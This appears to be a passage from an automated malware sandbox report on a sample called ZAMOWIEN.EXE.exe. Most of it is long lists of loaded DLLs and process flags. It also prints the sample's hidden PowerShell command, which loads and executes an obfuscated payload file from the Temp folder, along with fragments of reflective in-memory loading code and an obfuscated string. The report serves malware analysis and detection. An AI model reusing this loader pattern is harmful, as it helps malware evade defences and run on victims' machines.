              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeFile written: C:\Users\user\AppData\Local\Temp\Cloud Setting.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1680629547.000000000776D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Gy enTOutagu UdflnShephnPraeseMaxinlForere SarcdRaffl Grund'Vibre2KommaA Repu6,idgy3Utila6 entlFObscu6 FalcDDragg7TommeCUpcry6Telef1Multi6U aknD.atac6 und.2 xcer6Mi liFSdigh6AcadeA forr6Labo 1Sk iv7BjeliBVan k7N.nshD A rs2,oshv0Frds 4Me trARestr6DemimBTrans6.ndkv8Stvfr6Chefm7Ene r6Bitte0Fenci6StudiBAfh p4No,bl3Gestn6AtredB,pend7rat nA Rad,6Poten6Unrep6Ell g1 Filt6 mpulA Vid 2Regal6De on2K mfeASpred4EncumFCombi6AcptrDSterl6Lovl BGeni 3noncoFStego3Dokum9Kahyt3SysteANgend2K,lkv2 sych2SympaE Momi2 Ska ATr.ga5EksilA Afma7UsualCOp ag6Troch7Espyi6GenbrD Mart6Ddsma6Cytos6Crans1 Un a6 Outb0Lysed6Rain 1Te.ni7 radADipri6 in e7Hu,ha6B,falAD.sin2A,tik2Advar2taxieELogfi2ByggrAste h5pro.eCBrok 6V,lgaFSik e7FanatE Afsk7MetatA ,ncl7PassiBSai y7 impeD Inca7Str.pDBestr6Ha buBFourf7SpiseCRicin6Asthm0beli 6FrateBobscu7O.rroDBirle2 Fest2Parr 2Haan.ESluto2GgebgAKunst5Fa tlBMikro6Rei fASprit6Choic9Thi,a6HindeFindda6 MidtF Bill6SteerBMilli6CourgAHjemm6KlikdB Hexa3min.rFDepr 3 NonsE Magn3Ra he6 Deox2 Pro,7Glome2Terah0 Ambs5ByggeDVulne6 GeneBgc ll7GenneAphilt4Under7enca 6Halvf3Deka 7CigarESlagt6Ma.ag2Mealy6AutocBSk pt6Stigm3Ergot6MathfB Octy6Infek0scrol7 lusA Over6 FyrrFAlbge7til yARes i6 Noni7Un ou6 Cang1 Opp,6Til,n0 drin4 Mo.a8Sawto6Ansku2Aliso6Pai.lFUpcas6Hflig9saute7DevolD.askv2Te,tr6Sprin2 PromATempo4Afses8bibli6 Barb7Spekt7 tilsCSandh6Flung3Skuff6FrerhFGesim7PseudDF ugt7OverfA Pate7Filch7Eleve7 Em.aCBemrk6 Kip,7 port6 B.dg0Le is6Grns 9livmo2Behoe7Opraa'Rootc But e1 Unse source: powershell.exe, 00000002.00000002.1678420817.000000000625E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1678420817.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, Rapses.Arb.0.dr
              Source: Binary string: tem.Core.pdbST< source: powershell.exe, 00000002.00000002.1684612669.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: qm.Core.pdbST source: powershell.exe, 00000002.00000002.1684612669.0000000008A80000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000002.00000002.1686392459.000000000C60C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Lovkyndiges $Trasseres $Sidelayout), (Jonbytnings @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tectibranchiate = [AppDomain]::CurrentDomain.GetAssemblie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Reklamerende)), $Genear).DefineDynamicModule($Alfaderlige, $false).DefineType($Vanquish, $transversion, [System.MulticastDelegate])$ma
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04BDCE8A push eax; mov dword ptr [esp], edx2_2_04BDCE94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04BD6905 push 006BC3DCh; ret 2_2_04BD690A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0785C35C push eax; ret 2_2_0785C35D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0785944E push esp; ret 2_2_0785944F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0785945B push esp; ret 2_2_0785945C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09340BF0 push edx; retf 2_2_09340C0A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09340C10 push edx; retf 2_2_09340C1A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09340FA0 push eax; ret 2_2_09341351
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0934135D push esi; retf 2_2_0934135E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093413E9 push esi; retf 2_2_093413EE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093413C9 push esi; retf 2_2_093413CE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09341401 push esi; retf 2_2_09341406

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
